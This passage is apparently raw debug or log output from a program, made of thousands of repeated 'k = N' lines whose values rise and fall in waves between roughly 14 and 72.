36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 72\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 71\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 34\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 71\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 30\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 68\nk = 69\nk = 70\nk = 69\nk = 68\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 29\nk = 29\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 70\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 69\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 25\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 69\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 25\nk = 25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 24\nk = 25\nk = 25\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 25\nk = 25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 23\nk = 24\nk = 24\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 29\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 29\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 26\nk = 25\nk = 25\nk = 24\nk = 24\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 27\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 68\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 27\nk = 26\nk = 26\nk = 25\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 20\nk = 20\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 19\nk = 19\nk = 20\nk = 20\nk = 20\nk = 21\nk = 21\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 67\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 21\nk = 21\nk = 20\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 18\nk = 18\nk = 19\nk = 19\nk = 19\nk = 20\nk = 20\nk = 21\nk = 21\nk = 22\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 25\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 66\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 25\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 22\nk = 21\nk = 21\nk = 20\nk = 20\nk = 19\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 17\nk = 18\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 16\nk = 17\nk = 17\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 15\nk = 16\nk = 16\nk = 16\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 16\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 14\nk = 15\nk = 15\nk = 15\nk = 16\nk = 16\nk = 17\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 